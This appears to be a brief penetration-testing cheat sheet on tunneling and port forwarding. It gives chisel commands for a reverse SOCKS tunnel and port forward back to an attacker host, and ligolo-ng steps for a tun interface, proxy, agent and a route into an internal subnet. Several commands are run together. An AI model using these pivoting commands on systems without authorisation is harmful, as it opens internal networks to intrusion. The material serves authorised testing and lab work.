Tunneling & Port Forwarding
chisel
We should not forget to configure our proxychains.conf accordingly.
chisel server --reverse --port 8080chisel client 10.10.14.161:8080 R:sockschisel client 10.10.14.161:8080 R:9000:127.0.0.1:9000ligolo-ng
Prepare Tunnel Interface
sudo ip tuntap add user cub3 mode tun ligolo # Setup the interfacesudo ip link set ligolo upSetup Proxy
proxy -laddr 10.10.14.161:443 -selfcert # Setup ProxySetup Agent
agent -connect <LHOST>:443 -ignore-cert # Setup AgentConfigure Session
ligolo-ng Β» session[Agent : nice@target] Β» ifconfigsudo ip route add 172.16.1.0/24 dev ligolo[Agent : nice@target] Β» startssh
ssh Last updated
